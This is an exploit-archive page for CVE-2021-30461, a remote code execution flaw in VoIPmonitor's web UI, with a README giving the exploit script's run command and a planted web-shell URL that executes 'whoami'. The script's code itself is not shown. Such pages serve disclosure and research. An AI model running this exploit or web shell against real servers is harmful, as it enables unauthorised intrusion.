Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2021-30461 PoC — VoIPmonitor 代码注入漏洞

Source
Associated Vulnerability
Title:VoIPmonitor 代码注入漏洞 (CVE-2021-30461)
Description:A remote code execution issue was discovered in the web UI of VoIPmonitor before 24.61. When the recheck option is used, the user-supplied SPOOLDIR value (which might contain PHP code) is injected into config/configuration.php.
Description
CVE-2021-30461
Readme
### Impacted Products

VoIPmonitor < 24.60

### How to RCE

```
python3 CVE-2021-30461.py -t ip_address
```

![rce](img/exp.png)

Browser shell:

```
http://x.x.x.x/namrlblgel.php?a=whoami
```

![shell](img/shell.png)

### Reference

https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/

File Snapshot

[4.0K] /data/pocs/e3012af937334f54707c870a36f42e75a6776b14 ├── [2.8K] CVE-2021-30461.py ├── [4.0K] img │   ├── [ 91K] exp.png │   └── [ 15K] shell.png └── [ 323] README.md 1 directory, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →